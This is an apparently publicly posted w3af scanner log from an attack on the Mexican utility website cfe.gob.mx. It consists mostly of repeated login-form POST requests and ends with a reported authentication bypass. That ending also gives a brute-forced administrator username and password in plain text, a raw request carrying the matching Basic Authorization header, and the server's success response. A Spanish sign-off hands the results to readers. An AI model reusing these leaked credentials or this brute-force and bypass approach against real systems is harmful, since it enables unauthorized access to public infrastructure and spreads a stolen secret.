[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/_vti_inf.html | Method: GET
[Tue 24 May 2011 11:37:30 PM CDT] The resource: "http://www.cfe.gob.mx/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.

htaccessMethods/auth/Misconfigured acces control:

The resource: "http://www.cfe.gob.mx/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.

basicAuthBrute/auth/Guessable credentials:

Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/73mp123. This vulnerability was found in the request with id 95.

Raw:

GET http://www.cfe.gob.mx/Paginas/Home.aspx HTTP/1.1
Accept: */*
Host: www.cfe.gob.mx
Accept-encoding: identity
Authorization: Basic YWRtaW46NzNtcDEyMw==
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)

TTP/1.1 200 OK
content-length: 54092
x-powered-by: ASP.NET
microsoftsharepointteamservices: 12.0.0.6421
expires: Tue, 10 May 2011 04:31:55 GMT
server: Microsoft-IIS/6.0
last-modified: Wed, 25 May 2011 04:31:55 GMT
cache-control: private, max-age=0
date: Wed, 25 May 2011 04:31:56 GMT
content-type: text/html; charset=utf-8
x-aspnet-version: 2.0.50727

Hay selas dejo.

Saludos Mundo libre